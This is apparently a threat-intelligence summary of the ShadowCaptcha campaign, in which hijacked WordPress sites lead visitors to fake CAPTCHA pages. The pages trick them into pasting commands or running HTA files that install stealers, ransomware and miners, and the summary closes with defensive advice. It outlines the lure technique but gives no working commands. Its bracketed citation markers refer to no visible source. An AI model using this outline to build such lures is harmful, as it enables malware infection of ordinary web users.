ShadowCaptcha campaign hijacks WordPress sites to deliver ransomware, info‑stealers and cryptominers

Overview

Researchers from Israel’s National Digital Agency have uncovered ShadowCaptcha, a large‑scale cybercrime campaign that exploits over 100 compromised WordPress sites【240246561838073†L61-L67】. Visitors to the hijacked sites are redirected to malicious CAPTCHA pages that employ a “ClickFix” social‑engineering tactic. These pages trick users into running malicious commands or saving an HTML Application (HTA) file, leading to infection with information‑stealing malware, ransomware and cryptocurrency miners【240246561838073†L61-L77】.

Unlike typical drive‑by downloads, ShadowCaptcha blends social engineering with Windows Living‑off‑the‑Land binaries (LOLBins) and multi‑stage payloads to gain persistence【240246561838073†L69-L77】. Its objectives range from credential harvesting and browser data exfiltration to deploying cryptocurrency miners or causing ransomware outbreaks【240246561838073†L74-L77】.

Attack chain and techniques

The malicious JavaScript injected into the compromised WordPress sites initiates a redirection chain that culminates in a fake Cloudflare or Google CAPTCHA page【240246561838073†L79-L83】. From there, the attack follows one of two paths:

1. Windows Run dialog branch: The site displays a ClickFix prompt instructing the user to press Win+R and paste a malicious command. The command triggers MSI installers or HTA payloads that deploy the Lumma and Rhadamanthys information stealers【240246561838073†L84-L92】.
2. HTA file branch: Users are instructed to save a web page as an HTA file and execute it with mshta.exe. This chain results in the installation of Epsilon Red ransomware【240246561838073†L84-L96】.

To increase success, the attackers employ JavaScript that automatically copies the malicious command to the user’s clipboard【240246561838073†L101-L104】. They also use anti‑debugging techniques to prevent inspection via browser developer tools and rely on DLL side‑loading to execute payloads under legitimate processes【240246561838073†L106-L109】. Some variants deliver XMRig miners using Pastebin to fetch configuration data【240246561838073†L112-L115】.

Impact and mitigation

The campaign has compromised WordPress sites across Australia, Brazil, Italy, Canada, Colombia and Israel, affecting sectors from technology and hospitality to healthcare and real estate【240246561838073†L122-L124】. To defend against ShadowCaptcha:

1. Patch and harden WordPress sites. Apply the latest updates, remove outdated plugins and scan for unauthorized modifications.
2. Deploy web application firewalls and content‑security policies to block malicious scripts and redirection chains.
3. Educate users about ClickFix‑style scams. They should never run commands or save HTA files at the instruction of a web page.
4. Implement network segmentation and multi‑factor authentication to limit lateral movement【240246561838073†L126-L129】.
5. Monitor logs and endpoints for suspicious activity such as clipboard manipulation or unusual use of msiexec.exe, mshta.exe and DLL side‑loading.

Conclusion

ShadowCaptcha illustrates how attackers continue to innovate by combining social engineering with living‑off‑the‑land binaries and multi‑stage payloads. By hijacking trusted WordPress sites, the campaign can reach a wide audience while evading security controls. Organizations must harden their web presence, educate users and employ layered defences to prevent malware infections via malicious CAPTCHA scams.